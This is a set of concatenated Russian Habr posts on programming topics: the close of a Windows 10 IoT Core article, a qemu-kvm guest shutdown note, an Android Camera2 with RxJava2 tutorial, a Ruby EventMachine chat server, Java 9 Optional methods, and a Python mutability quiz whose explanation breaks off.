Появление Windows 10 IoT Core – это именно то, чего ждали embedded-разработчики. Когда ресурсов даже самого мощного микроконтроллера на .NET Micro Framework (для которого, кстати, тоже [есть реализация DeviceHive](https://github.com/devicehive/devicehive-.net-mf)) не хватает, а ставить полноценный компьютер на Windows – все равно, что стрелять из пушки по воробьям, то Windows 10 IoT Core – настоящее спасение. И пусть пока есть нюансы с аппаратным ускорением графики и недостатком драйверов для некоторых USB-устройств – это всё простительно. Ведь еще недавно мы только мечтали, чтобы Windows-приложения, работающие на настольных ПК и планшетах запускались не только на телефонах, но и на микрокомпьютерах. А теперь – это реальность, добро пожаловать в «сегодня».
---

### Об авторе
*Антон Седышев — Senior .NET-разработчик «DataArt »
В IT работает с далекого 2003, к команде DataArt присоединился в 2012. Ранее занимался разработкой веб- и мобильных проектов, автоматизицией логистических процессов на складах крупной международной компании. Сейчас выступает в роли ведущего .NET-разработчика и идеолога Microsoft-сообщества DataArt. Занимается разработкой приложений на Windows Phone и Windows 10, сервисом DeviceHive и embedded-технологиями вообще. В свободное время работает над собственным OpenSource embedded-проектом по интеграции .NET Micro Framework устройства в автомобили BMW.* | https://habr.com/ru/post/280294/ | null | ru | null |
# Настройка корректного завершения работы гостевой Windows 2003 в qemu-kvm Linux
Это не статья, а просто заметка для тех кто столкнулся с проблемой корректного выключения.
Я не претендую на оригинальность, но лекрство собранное по частям на просторах интернета мне помогло, надеюсь поможет и вам.
1. Скрипт для посыла сигнала завершения работы гостевым ОС
`#!/bin/bash
CONNECT_STRING="qemu:///system"
for MACHINE in $(virsh -c "$CONNECT_STRING" list | awk '/running$/ {print
$2}') ; do
virsh -c "$CONNECT_STRING" shutdown $MACHINE
done
sleep 600`
2. Настроить ключ в реестре ОС
HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
ShutdownWarningDialogTimeout dword:00000001
3. Изменить локальную политику безопастности
Control Pannel -> Admin tools ->Local security Policy
Local policies ->Security Options ->Shutdown: Allow system to be shutdown...->Enable
Вот и все. | https://habr.com/ru/post/145980/ | null | ru | null |
# О способах продвижения.
Вот такой, можно сказать, нестандартный способ продвижения встретил в Петербургском метро, на рекламных постерах с пивом были расклеены сообщения: “Русский хватит пить! Твой народ вымирает!”. Сама форма подачи не оригинальна, довольно часто встречается, но в данном случае заинтересовала не форма и содержание, а способ реализации.
``
Честно сказать, все мои предположения об объекте продвижения оказались ошибочными, о газете “Русь Православная” я бы никогда не подумал.) | https://habr.com/ru/post/39518/ | null | ru | null |
# Побеждаем Android Camera2 API с помощью RxJava2 (часть 2)

Это вторая часть [статьи](https://habrahabr.ru/company/badoo/blog/330080/), в которой я показываю, как использование RxJava2 помогает строить логику поверх асинхронного API. В качестве такого интерфейса я выбрал Android Camera2 API (и не пожалел!). Этот API не только асинхронен, но и таит в себе неочевидные особенности реализации, которые нигде толком не описаны. Так что статья нанесет читателю двойную пользу.
Для кого этот пост? Я рассчитываю, что читатель — умудрённый опытом, но всё ещё любознательный Android-разработчик. Очень желательны базовые знания о реактивном программировании ([хорошее введение — здесь](https://habrahabr.ru/company/badoo/blog/328434/)) и понимание Marble Diagrams. Пост будет полезен тем, кто хочет проникнуться реактивным подходом, а также тем, кто планирует использовать Camera2 API в своих проектах.
Исходники проекта можно [найти на GitHub](https://github.com/ArkadyGamza/Camera2API_rxJava2).
Чтение [первой части](https://habrahabr.ru/company/badoo/blog/330080/) обязательно!
Постановка задачи
-----------------
В конце первой части я пообещал, что раскрою вопрос ожидания срабатывания автофокуса/ автоэкспозиции.
Напомню, цепочка операторов выглядела так:
```
Observable.combineLatest(previewObservable, mOnShutterClick, (captureSessionData, o) -> captureSessionData)
.firstElement().toObservable()
.flatMap(this::waitForAf)
.flatMap(this::waitForAe)
.flatMap(captureSessionData -> captureStillPicture(captureSessionData.session))
.subscribe(__ -> {}, this::onError)
```
Итак, что же мы хотим от методов `waitForAe` и `waitForAf`? Чтобы были запущены процессы автофокусировки/ автоэкспозиции, а по их завершении мы бы получили уведомление о готовности к снимку.
Для этого нужно, чтобы оба метода возвращали `Observable`, который испускает событие, когда камера сообщает о том, что процесс схождения сработал (чтобы не повторять слова «автофокусировка» и «автоэкспозиция», далее я буду использовать слово «схождение»). Но как запустить и проконтролировать этот процесс?
Те самые неочевидные особенности конвейера Camera2 API
------------------------------------------------------
Сначала я думал, что достаточно вызвать [`capture`](https://developer.android.com/reference/android/hardware/camera2/CameraCaptureSession.html#capture(android.hardware.camera2.CaptureRequest,%20android.hardware.camera2.CameraCaptureSession.CaptureCallback,%20android.os.Handler)) c нужными флажками и дождаться в переданном `CaptureCallback` вызова [`onCaptureCompleted`](https://developer.android.com/reference/android/hardware/camera2/CameraCaptureSession.CaptureCallback.html#onCaptureCompleted(android.hardware.camera2.CameraCaptureSession,%20android.hardware.camera2.CaptureRequest,%20android.hardware.camera2.TotalCaptureResult)).
Вроде логично: запустили запрос, дождались выполнения — значит, запрос выполнен. И такой код даже ушел в продакшен.
Но потом мы заметили, что на некоторых устройствах в очень тёмных условиях даже при срабатывающей вспышке фотографии получаются не в фокусе и затемнённые. При этом системная камера работала отлично, правда, у неё уходило гораздо больше времени на подготовку к снимку. Я начал подозревать, что в моем случае автофокус к моменту `onCaptureCompleted` не успевает сфокусироваться.
Для проверки своего тезиса я добавил задержку в секунду — и снимки стали получаться! Понятно, что таким решением я не мог быть доволен, и начал искать, как на самом деле можно понять, что автофокус сработал и можно продолжать. Документации на эту тему найти не удалось, и мне пришлось обратиться к сорсам системной камеры, благо они доступны как часть [Android Open Source Project](https://source.android.com/). Код оказался на редкость нечитаемым и запутанным, пришлось добавлять логирование и анализировать логи камеры при съёмке в темноте. И я обнаружил, что после capture с нужными флажками системная камера вызывает [`setRepeatingRequest`](https://developer.android.com/reference/android/hardware/camera2/CameraCaptureSession.html#setRepeatingRequest(android.hardware.camera2.CaptureRequest,%20android.hardware.camera2.CameraCaptureSession.CaptureCallback,%20android.os.Handler)) для продолжения превью и ждёт, пока в колбек не придёт [`onCaptureCompleted`](https://developer.android.com/reference/android/hardware/camera2/CameraCaptureSession.CaptureCallback.html#onCaptureCompleted(android.hardware.camera2.CameraCaptureSession,%20android.hardware.camera2.CaptureRequest,%20android.hardware.camera2.TotalCaptureResult)) с определённым набором флагов в `TotalCaptureResult`. Нужный ответ мог прийти через несколько `onCaptureCompleted`!
Когда я осознал эту особенность, поведение Camera2 API стало казаться логичным. Но сколько потребовалось приложить усилий, чтобы найти эти сведения! Что ж, теперь можно перейти к описанию решения.
Итак, наш план действий:
* вызов capture с флагами, запускающими процесс схождения;
* вызов `setRepeatingRequest` для продолжения превью;
* получение уведомлений от обоих методов;
* ожидание в результатах уведомлений `onCaptureCompleted` свидетельств того, что процесс схождения завершён.
Поехали!
Флажки
------
Создадим класс `ConvergeWaiter` со следующими полями:
```
private final CaptureRequest.Key mRequestTriggerKey;
private final int mRequestTriggerStartValue;
```
Это ключ и значение флажка, который запустит необходимый процесс схождения при вызове `capture`.
Для автофокуса это будут `CaptureRequest.CONTROL_AF_TRIGGER` и `CameraMetadata.CONTROL_AF_TRIGGER_START` соответственно. Для автоэкспозиции — `CaptureRequest.CONTROL_AE_PRECAPTURE_TRIGGER` и `CameraMetadata.CONTROL_AE_PRECAPTURE_TRIGGER_START` соответственно.
```
private final CaptureResult.Key mResultStateKey;
private final List mResultReadyStates;
```
А это ключ и набор ожидаемых значений флага из результата `onCaptureCompleted`. Когда мы увидим одно из ожидаемых значений ключа, можно считать, что процесс схождения выполнен.
Для автофокуса значение ключа `CaptureResult.CONTROL_AF_STATE`, список значений:
```
CaptureResult.CONTROL_AF_STATE_INACTIVE,
CaptureResult.CONTROL_AF_STATE_PASSIVE_FOCUSED,
CaptureResult.CONTROL_AF_STATE_FOCUSED_LOCKED,
CaptureResult.CONTROL_AF_STATE_NOT_FOCUSED_LOCKED;
```
для автоэкспозиции значение ключа `CaptureResult.CONTROL_AE_STATE`, список значений:
```
CaptureResult.CONTROL_AE_STATE_INACTIVE,
CaptureResult.CONTROL_AE_STATE_FLASH_REQUIRED,
CaptureResult.CONTROL_AE_STATE_CONVERGED,
CaptureResult.CONTROL_AE_STATE_LOCKED.
```
Не спрашивайте меня, как я это выяснил! Теперь мы можем создавать инстансы `ConvergeWaiter` для автофокуса и экспозиции, для этого сделаем фабрику:
```
static class Factory {
private static final List afReadyStates = Collections.unmodifiableList(
Arrays.asList(
CaptureResult.CONTROL\_AF\_STATE\_INACTIVE,
CaptureResult.CONTROL\_AF\_STATE\_PASSIVE\_FOCUSED,
CaptureResult.CONTROL\_AF\_STATE\_FOCUSED\_LOCKED,
CaptureResult.CONTROL\_AF\_STATE\_NOT\_FOCUSED\_LOCKED
)
);
private static final List aeReadyStates = Collections.unmodifiableList(
Arrays.asList(
CaptureResult.CONTROL\_AE\_STATE\_INACTIVE,
CaptureResult.CONTROL\_AE\_STATE\_FLASH\_REQUIRED,
CaptureResult.CONTROL\_AE\_STATE\_CONVERGED,
CaptureResult.CONTROL\_AE\_STATE\_LOCKED
)
);
static ConvergeWaiter createAutoFocusConvergeWaiter() {
return new ConvergeWaiter(
CaptureRequest.CONTROL\_AF\_TRIGGER,
CameraMetadata.CONTROL\_AF\_TRIGGER\_START,
CaptureResult.CONTROL\_AF\_STATE,
afReadyStates
);
}
static ConvergeWaiter createAutoExposureConvergeWaiter() {
return new ConvergeWaiter(
CaptureRequest.CONTROL\_AE\_PRECAPTURE\_TRIGGER,
CameraMetadata.CONTROL\_AE\_PRECAPTURE\_TRIGGER\_START,
CaptureResult.CONTROL\_AE\_STATE,
aeReadyStates
);
}
}
```
`capture`/`setRepeatingRequest`
-------------------------------
Для вызова `capture`/`setRepeatingRequest` нам потребуются:
* открытая ранее `CameraCaptureSession`, которая доступна в `CaptureSessionData`;
* `CaptureRequest`, который мы создадим, используя `CaptureRequest.Builder.`
Создадим метод
```
Single waitForConverge(@NonNull CaptureSessionData captureResultParams, @NonNull CaptureRequest.Builder builder)
```
Во второй параметр мы будем передавать `builder`, настроенный для превью. Поэтому `CaptureRequest` для превью можно создать сразу вызовом `CaptureRequest previewRequest = builder.build();`
Для создания `CaptureRequest` для запуска процедуры схождения добавим в `builder` флаг, который запустит необходимый процесс схождения:
```
builder.set(mRequestTriggerKey, mRequestTriggerStartValue);
CaptureRequest triggerRequest = builder.build();
```
И воспользуемся нашими методами для получения `Observable` из методов `capture`/`setRepeatingRequest`:
```
Observable triggerObservable = CameraRxWrapper.fromCapture(captureResultParams.session, triggerRequest);
Observable previewObservable = CameraRxWrapper.fromSetRepeatingRequest(captureResultParams.session, previewRequest);
```
Формирование цепочки операторов
-------------------------------
Теперь мы можем сформировать реактивный поток, в котором будут события от обоих Observable c помощью оператора `merge`.

```
Observable convergeObservable = Observable
.merge(previewObservable, triggerObservable)
```
Полученный `convergeObservable` будет испускать события с результатами вызовов `onCaptureCompleted`.
Нам необходимо дождаться момента, когда `CaptureResult`, переданный в этот метод, будет содержать ожидаемое значение флага. Для этого создадим функцию, которая принимает `CaptureResult` и возвращает `true` если в нём есть ожидаемое значение флага:
```
private boolean isStateReady(@NonNull CaptureResult result) {
Integer aeState = result.get(mResultStateKey);
return aeState == null || mResultReadyStates.contains(aeState);
}
```
Проверка на `null` нужна для кривых реализаций Camera2 API, чтобы не зависнуть в ожидании навеки.
Теперь мы можем воспользоваться оператором `filter`, чтобы дождаться события, для которого выполнено `isStateReady`:

```
.filter(resultParams -> isStateReady(resultParams.result))
```
Нам интересно только первое такое событие, поэтому добавляем
```
.first(captureResultParams);
```
Полностью реактивный поток выглядит так:
```
Single convergeSingle = Observable
.merge(previewObservable, triggerObservable)
.filter(resultParams -> isStateReady(resultParams.result))
.first(captureResultParams);
```
На случай если процесс схождения затягивается слишком долго или что-то пошло не так, введём таймаут:
```
private static final int TIMEOUT_SECONDS = 3;
Single timeOutSingle = Single
.just(captureResultParams)
.delay(TIMEOUT\_SECONDS, TimeUnit.SECONDS, AndroidSchedulers.mainThread());
```
Оператор `delay` переиспускает события с заданной задержкой. По умолчанию он это делает в потоке, принадлежащем computation scheduler, поэтому мы перекидываем его в Main Thread с помощью последнего параметра.
Теперь скомбинируем `convergeSingle` и `timeOutSingle`, и кто первый испустит событие — тот и победил:
```
return Single
.merge(convergeSingle, timeOutSingle)
.firstElement()
.toSingle();
```
Полный код функции:
```
@NonNull
Single waitForConverge(@NonNull CaptureSessionData captureResultParams, @NonNull CaptureRequest.Builder builder) {
CaptureRequest previewRequest = builder.build();
builder.set(mRequestTriggerKey, mRequestTriggerStartValue);
CaptureRequest triggerRequest = builder.build();
Observable triggerObservable = CameraRxWrapper.fromCapture(captureResultParams.session, triggerRequest);
Observable previewObservable = CameraRxWrapper.fromSetRepeatingRequest(captureResultParams.session, previewRequest);
Single convergeSingle = Observable
.merge(previewObservable, triggerObservable)
.filter(resultParams -> isStateReady(resultParams.result))
.first(captureResultParams);
Single timeOutSingle = Single
.just(captureResultParams)
.delay(TIMEOUT\_SECONDS, TimeUnit.SECONDS, AndroidSchedulers.mainThread());
return Single
.merge(convergeSingle, timeOutSingle)
.firstElement()
.toSingle();
}
```
`waitForAf`/`waitForAe`
-----------------------
Основная часть работы сделана, осталось лишь создать инстансы:
```
private final ConvergeWaiter mAutoFocusConvergeWaiter = ConvergeWaiter.Factory.createAutoFocusConvergeWaiter();
private final ConvergeWaiter mAutoExposureConvergeWaiter = ConvergeWaiter.Factory.createAutoExposureConvergeWaiter();
```
и использовать их:
```
private Observable waitForAf(@NonNull CaptureSessionData captureResultParams) {
return Observable
.fromCallable(() -> createPreviewBuilder(captureResultParams.session, mSurface))
.flatMap(
previewBuilder -> mAutoFocusConvergeWaiter
.waitForConverge(captureResultParams, previewBuilder)
.toObservable()
);
}
@NonNull
private Observable waitForAe(@NonNull CaptureSessionData captureResultParams) {
return Observable
.fromCallable(() -> createPreviewBuilder(captureResultParams.session, mSurface))
.flatMap(
previewBuilder -> mAutoExposureConvergeWaiter
.waitForConverge(captureResultParams, previewBuilder)
.toObservable()
);
}
```
Основной момент тут — использование оператора `fromCallable`. Может возникнуть соблазн использовать оператор `just`. Например, так:
```
just(createPreviewBuilder(captureResultParams.session, mSurface)).
```
Но в данном случае функция `createPreviewBuilder` будет вызвана прямо в момент вызова `waitForAf`, а мы хотим, чтобы она была вызвана, только когда появится подписка на наш `Observable`.
Заключение
----------
Как известно, самая ценная часть любой статьи на Хабре — комментарии! Поэтому я призываю вас активно делиться своими соображениями, замечаниями, ценными знаниями и ссылками на более удачные имплементации в комментариях.
Исходники проекта можно [найти на GitHub](https://github.com/ArkadyGamza/Camera2API_rxJava2). Пулреквесты приветствуются! | https://habr.com/ru/post/352318/ | null | ru | null |
# Чат-сервер на Ruby и Event Machine
Недавно передо мной стала задача написать небольшой чат-демон для крупного интернет-проекта. Эту задачу я решил с помощью Ruby и Event Machine. Подробности и маленький пример под катом.
После пробной версии чата, написанной на нативных сокетах Ruby, стало понятно что для достаточно большой нагрузки она не подойдет. Плюс ко всему работала она нестабильно. Я принял решения оптимизировать код. Поиски необходимой информации по теме особыми успехами не увенчались, тогда я решил посетить страницу проекта [thin](http://code.macournoyer.com/thin/), чтобы узнать как сделан этот веб-сервер и на этой странице наткнулся на ссылку на [Event Machine](http://rubyeventmachine.com/) — библиотеку сетевого ввода/вывода с крайне высокой масштабируемостью, производительностью и стабильностью. Я был впечатлен обещаниями и решил попробовать.
Как я понял из [документации по Event Machine](http://eventmachine.rubyforge.org/), библиотека не использует родные сокеты Ruby и реализует иной подход при работе с сетью, а также предоставляет событийно-управляемую программную модель.
Итак, приступим к созданию самого простого чат-сервера на EventMachine. Для начала, необходимо установить гем:
`sudo gem install eventmachine`
Приведу сразу код с комментариями:
`require 'rubygems'
require 'eventmachine'
module ChatLogic
@@connections = [] #Массив соединений
# Этот метод будет вызван при инициации соединения
def post_init
@@connections << self
end
# При получении новых данных будет вызван этот метод
def receive_data data
# Пересылаем данные каждому активному клиенту
@@connections.each{ |connection| connection.send_data data }
end
# При разрыве соединения будет вызван этот метод
def unbind
@@connections.delete(self)
end
end
# Запускаем сервер
EventMachine::run {
host,port = "0.0.0.0", 8090
EventMachine::start_server host, port, ChatLogic
puts "Listening #{host}:#{port}..."
}`
[Подсвеченый код на GitHub.](http://gist.github.com/128248)
Как видно, третьим параметром в метод EventMachine::start\_server передается имя модуля, который содержит объявление протокола или пользовательского функционала. Этот модуль будет ~~вмешан~~ (mixed-in) в класс EventMachine::Connection.
Также в модуле ChatLogic переопределны три метода, которые EventMachine вызовет автоматически при наступлении соответствующих событий: post\_init, receive\_data( data ), unbind которые инициируются для соединения при соединении, получении данных и разрыве. Разумеется в модуле можно определить и другие методы и классы для реализации логики работы сервера, только вызывать их нужно будет самостоятельно.
Итак, я привел код самого простого, но однако быстрого и стабильного чат-сервера на Ruby с использованием библиотеки Event Machine, которая похоже заслуживает внимания программистов и, кстати сказать, доступна не только для Ruby. | https://habr.com/ru/post/61920/ | null | ru | null |
# Объект в футляре или Optional в Java 8 и Java 9. Часть 3: «Что добавилось в Java 9»
[](https://habrahabr.ru/post/347748/)
Это третья статья серии, посвящённая использованию класса Optional при обработке объектов с динамической структурой. В [первой статье](https://habrahabr.ru/post/347480/) было рассказано о способах избежания NullPointerException в ситуациях, когда вы не можете или не хотите использовать Optional.
[Вторая статья](https://habrahabr.ru/post/347576/) посвящена описанию методов класса Optional в том виде, как он появился в Java 8.
Эта статья описывает методы класса, появившиеся в Java 9.
[Четвертая статья](https://habrahabr.ru/post/347836/) посвящена необходимому (с точки зрения автора) дополнению к этому классу. Ну а в [пятой статье](https://habrahabr.ru/post/350904/) я рассказываю о том, где внутри класса следует применять Optional, подвожу итоги и дарю каждому читателю, дочитавшему серию до конца, ценный подарок.
Исходные тексты примеров для этой и остальных статей на эту тему вы найдете в [проекте на GitHub](https://github.com/vsirotin/Smartenesse-Java).
В Java 9 в класс Optional добавлено три новых метода: stream(), ifPresentsOrElse() и or().
Начнем наше рассмотрение.
### Метод stream(): берем все что можно
Этот метод полезен, если у вас имеется список List>. Каждый элемент списка (согласно определению из первой статьи серии) это футляр, или контейнер, который может содержать “настоящий” элемент либо быть пустым. Если вам необходимо наиболее простым способом получить из этого списка все “настоящие” элементы – вам поможет в этом метод stream().
Представим себе такую ситуацию.
Программист Иван работает в проекте в режиме удаленного доступа (remote). Это дало ему возможность переехать жить в домик в деревне. В своем огороде он посадил несколько грядок овощей. (Если Вы, уважаемый читатель, практикующий дачник, будьте снисходительны к допущениям в моделировании предметной области).
Каждое утро Иван выходит в свой огород и собирает с кустов созревшие плоды. На каждом кусте плод за ночь может созреть, а может и не созреть. Поэтому мы можем смоделировать урожай каждого куста с помощью Optional. Для упрощения мы будем использовать в качестве T класс String.
Таким образом, урожай овощей, собираемый Иваном каждое утро мы можем смоделировать как List> getTomatoBeds().
Предположим, мы хотим получить список плодов (разумеется созревших) в виде массива.
Без использования stream() нам пришлось бы для этой цели написать for … цикл, перебрать в нем все “футляры”, записать “настоящие” элементы в список а оттуда переписать их в массив.
В Java 8 для массив созревших овощей можно получить так:
```
String[] result = tomatoGarden.getTomatoBeds()
.stream()
.filter(Optional::isPresent)
.map(Optional::get)
.toArray(String[]::new);
```
А в Java 9 это можно сделать ещё короче и элегантнее:
```
String[] result = tomatoGarden.getTomatoBeds()
.stream()
.flatMap(Optional::stream)
.toArray(String[]::new);
```
Замена двух строчек на одну оказалась возможной благодаря вызову внутри flatMap нового метода stream(). Этот метод, согласно [документации](https://docs.oracle.com/javase/9/docs/api/java/util/Optional.html) делает следующее: «Если объект присутствует, возвращает последовательный поток (stream), содержащий только этот объект, в противном случае возвращает пустой поток.»
В большинстве случаев мы используем метод stream() для обработки больших последовательностей данных. В случае с Optional мы столкнулись со stream() для обработки последовательности максимум из одного элемента.
Для закрепления ещё один пример:
```
public void testOptionalStreamBase() {
Optional opFilled = Optional.of("Filled");
assertEquals(1, opFilled.stream().count());
Optional opEmpty = Optional.empty();
assertEquals(0, opEmpty.stream().count());
}
```
### Metod ifPresentOrElse(): Если нет – добавим!
Этот новый метод закрыл дыру, оставшуюся в Java 8 и которую приходилось компенсировать комбинацией вызовов методов ifPresent(...) и orElse(...).
Посмотрим снова документацию на новый метод: «Если объект присутствует, выполняется заданное действие с ним, в противном случае выполняется действие с отсутствующим объектом.»
Другими словами, метод позволяет внутри себя обработать как заполненный так и пустой “футляр”.
Итак продолжим историю с Иваном. Иван каждое утро выходит в свой огород, собирает созревшие овощи и складывает их в салат. Для моделирования этого факта мы будем использовать метод setValue(String s). А вот если на грядках ничего не выросло, ему приходится доставать консервированные овощи из банки. Для этого мы будем использовать метод setDefault().
Вот их реализация:
```
private void setValue(String s){
veg = s;}
private void setDefault(){
veg = CANNED_FOOD;}
```
Переменная класса veg это то, что окажется у Ивана в салатнице.
А теперь проверим, как ifPresentOrElse() работает с помощью теста:
```
@Test
public void testOptionalStreamIfPresentOrElse() {
Optional optFilled = Optional.of(TOMATO);
optFilled.ifPresentOrElse(this::setValue, this::setDefault);
assertEquals(TOMATO, veg);
Optional optEmpty = Optional.empty();
optEmpty.ifPresentOrElse(this::setValue, this::setDefault);
assertEquals(CANNED\_FOOD, veg);
}
```
Как мы видим, с помощью этой модели Иван хоть и не нашел на грядке свежего овоща, но заместил его овощем из консервной банки. И всё внутри вызова одного метода!
### Метод or(): упорно ищем своё счастье!
Внимательный читатель наверное подметил, что в предыдущем примере Иван обследовал только первый куст. А как смоделировать ситуацию, если кустов много?
В этом случае нам поможет метод or(). Снова заглянем в документацию: «Если объект присутствует, возвращает Optional содержащий его, в противном случае возвращает Optional, созданный функцией.»
Другими словами, с помощью or() можно строить цепочки обработки, которые будут анализировать “футляры” (Optional) до тех пор, пока не встретится первый непустой элемент.
В следующем примере optBed1, 2, 3 моделируют отдельные кусты.
```
@Test
public void testOptionalOr1() {
Optional optBed1 = Optional.empty();
Optional optBed2 = Optional.of(TOMATO);
Optional optBed3 = Optional.of(CUCUMBER);
String res = optBed1
.or(()->optBed2)
.or(()->optBed3)
.or(()->getDefault())
.get();
assertEquals(res, TOMATO);
}
```
Поздравим Ивана, с помощью нового метода or() он в этот раз продвинулся дальше, нашел свежий помидор и ему не придется есть овощи из консервной банки.
**Полный текст теста**
```
public class VegetableGardenTest {
private static final String CANNED_FOOD = "Canned food";
private static final String MY_GARDEN = "My garden";
public static final String TOMATO = "Tomato";
public static final String CUCUMBER = "Cucumber";
private String[] EXPECTED_RESULT;
private VegetableGarden tomatoGarden;
private String veg;
@Before
public void setUp() throws Exception {
EXPECTED_RESULT = new String[]{"A1", "A3", "A6"};
tomatoGarden = new VegetableGarden("A1", null, "A3", null, null, "A6");
}
@Test
public void testOptionalStreJava8() {
String[] result = tomatoGarden
.getTomatoBeds()
.stream()
.filter(Optional::isPresent)
.map(Optional::get)
.toArray(String[]::new);
assertArrayEquals(EXPECTED_RESULT, result);
}
@Test
public void testOptionalStreamJava9() {
String[] result = tomatoGarden
.getTomatoBeds()
.stream()
.flatMap(Optional::stream)
.toArray(String[]::new);
assertArrayEquals(EXPECTED_RESULT, result);
}
@Test
public void testOptionalStreamBase() {
Optional opFilled = Optional.of("Filled");
assertEquals(1, opFilled.stream().count());
Optional opEmpty = Optional.empty();
assertEquals(0, opEmpty.stream().count());
}
@Test
public void testOptionalStreamIfPresentOrElse() {
Optional optFilled = Optional.of(TOMATO);
optFilled.ifPresentOrElse(this::setValue, this::setDefault);
assertEquals(TOMATO, veg);
Optional optEmpty = Optional.empty();
optEmpty.ifPresentOrElse(this::setValue, this::setDefault);
assertEquals(CANNED\_FOOD, veg);
}
@Test
public void testOptionalOr1() {
Optional optBed1 = Optional.empty();
Optional optBed2 = Optional.of(TOMATO);
Optional optBed3 = Optional.of(CUCUMBER);
String res1 = optBed1
.or(()->{return optBed2;})
.or(()->optBed3)
.or(this::getDefault)
.get();
assertEquals(res1, TOMATO);
}
@Test
public void testOptionalOr2() {
Optional optBed1 = Optional.empty();
Optional optBed2 = Optional.empty();
Optional optBed3 = Optional.empty();
String res1 = optBed1
.or(()->optBed2)
.or(()->optBed3)
.or(()->getDefault())
.get();
assertEquals(res1, CANNED\_FOOD);
}
private void setValue(String s){
veg = s;}
private void setDefault(){
veg = CANNED\_FOOD;}
private Optional extends String getDefault(){return Optional.of(CANNED\_FOOD);};
}
```
Нововведения в классе Optional в Java 9 увеличили его мощь и привлекательность для повседневного использования в Java — проектах. И тем не менее, мои ожидания не сбылись.
Дело в том, что при обработке объектов с динамической структурой в случае, если объект не может быть создан или получен из ресурса, важно не только предохраниться от NullPointerException, но и узнать причину неудачи. А хорошего способа для решения подобной проблемы не предлагает и Java 9.
Поэтому я рискну предложить в [следующей статье](https://habrahabr.ru/post/347836/) собственное решение этой важной практической задачи.
Иллюстрация: [ThePixelman](https://pixabay.com/de/k%C3%A4tzchen-tier-haustiere-katze-491013/) | https://habr.com/ru/post/347748/ | null | ru | null |
# А вы можете решить эти три (обманчиво) простые задачи на Python?
С самого начала своего пути как разработчика программного обеспечения я очень любил копаться во внутренностях языков программирования. Мне всегда было интересно, как устроена та или иная конструкция, как работает та или иная команда, что под капотом у синтаксического сахара и т.п. Недавно мне на глаза попалась интересная статья с примерами того, как не всегда очевидно работают mutable- и immutable-объекты в Python. На мой взгляд, ключевое — это то, как меняется поведение кода в зависимости от используемого типа данных, при сохранении идентичной семантики и используемых языковых конструкциях. Это отличный пример того, что думать надо не только при написании, но и при использовании. Предлагаю всем желающим ознакомиться с переводом.

Попробуйте решить эти три задачи, а потом сверьтесь с ответами в конце статьи.
**Совет**: у задач есть кое-что общее, поэтому освежите в памяти решение первой задачи, когда перейдёте ко второй или третьей, так вам будет проще.
### Первая задача
Есть несколько переменных:
```
x = 1
y = 2
l = [x, y]
x += 5
a = [1]
b = [2]
s = [a, b]
a.append(5)
```
Что будет выведено на экран при печати `l` и `s`?
### Вторая задача
Определим простую функцию:
```
def f(x, s=set()):
s.add(x)
print(s)
```
Что будет, если вызвать:
```
>>f(7)
>>f(6, {4, 5})
>>f(2)
```
### Третья задача
Определим две простые функции:
```
def f():
l = [1]
def inner(x):
l.append(x)
return l
return inner
def g():
y = 1
def inner(x):
y += x
return y
return inner
```
Что мы получим после выполнения этих команд?
```
>>f_inner = f()
>>print(f_inner(2))
>>g_inner = g()
>>print(g_inner(2))
```
Насколько вы уверены в своих ответах? Давайте проверим вашу правоту.
### Решение первой задачи
```
>>print(l)
[1, 2]
>>print(s)
[[1, 5], [2]]
```
Почему второй список реагирует на изменение своего первого элемента `a.append(5)`, а первый список полностью игнорирует такое же изменение `x+=5`?
### Решение второй задачи
Посмотрим, что произойдёт:
```
>>f(7)
{7}
>>f(6, {4, 5})
{4, 5, 6}
>>f(2)
{2, 7}
```
Погодите, разве последним результатом не должно быть `{2}`?
### Решение третьей задачи
Результат будет таким:
```
>>f_inner = f()
>>print(f_inner(2))
[1, 2]
>>g_inner = g()
>>print(g_inner(2))
UnboundLocalError: local variable ‘y’ referenced before assignment
```
Почему `g_inner(2)` не выдала `3`? Почему внутренняя функция `f()` помнит о внешней области видимости, а внутренняя функция `g()` не помнит? Они же практически идентичны!
### Объяснение
Что если я скажу вам, что все эти примеры странного поведения связаны с различием между изменяемыми и неизменяемыми объектами в Python?
Изменяемые объекты, такие как списки, множества или словари, могут быть изменены на месте. Неизменяемые объекты, такие как числовые и строковые значения, кортежи, не могут быть изменены; их «изменение» приведёт к созданию новых объектов.
### Объяснение первой задачи
```
x = 1
y = 2
l = [x, y]
x += 5
a = [1]
b = [2]
s = [a, b]
a.append(5)
>>print(l)
[1, 2]
>>print(s)
[[1, 5], [2]]
```
Поскольку `x` неизменяема, операция `x+=5` не меняет исходный объект, а создаёт новый. Но первый элемент списка всё ещё ссылается на исходный объект, поэтому его значение не меняется.
Т.к. a изменяемый объект, то команда `a.append(5)` меняет исходный объект (а не создает новый), и список `s` «видит» изменения.
### Объяснение второй задачи
```
def f(x, s=set()):
s.add(x)
print(s)
>>f(7)
{7}
>>f(6, {4, 5})
{4, 5, 6}
>>f(2)
{2, 7}
```
С первыми двумя результатами всё понятно: первое значение `7` добавляется к изначально пустому множеству и получается `{7}`; потом значение `6` добавляется к множеству `{4, 5}` и получается `{4, 5, 6}`.
А потом начинаются странности. Значение `2` добавляется не к пустому множеству, а к {7}. Почему? Исходное значение опционального параметра `s` вычисляется только один раз: при первом вызове s будет инициализировано как пустое множество. А поскольку оно изменяемое, после вызова `f(7)` оно будет будет изменено “на месте”. Второй вызов `f(6, {4, 5})` не повлияет на параметр по умолчанию: его заменяет множество `{4, 5}`, то есть `{4, 5}` является другой переменной. Третий вызов `f(2)` использует ту же переменную `s`, что использовалась при первом вызове, но она не переинициализируется как пустое множество, а вместо этого берётся её предыдущее значение `{7}`.
Поэтому не следует использовать изменяемые аргументы в качестве аргументов по умолчанию. В этом случае функцию нужно изменить:
```
def f(x, s=None):
if s is None:
s = set()
s.add(x)
print(s)
```
### Объяснение третьей задачи
```
def f():
l = [1]
def inner(x):
l.append(x)
return l
return inner
def g():
y = 1
def inner(x):
y += x
return y
return inner
>>f_inner = f()
>>print(f_inner(2))
[1, 2]
>>g_inner = g()
>>print(g_inner(2))
UnboundLocalError: local variable ‘y’ referenced before assignment
```
Здесь мы имеем дело с замыканиями: внутренние функции помнят, как выглядели их внешние пространства имён на момент своего определения. Или хотя бы должны помнить, однако вторая функция делает покерфейс и ведёт себя так, словно не слышала о своём внешнем пространстве имён.
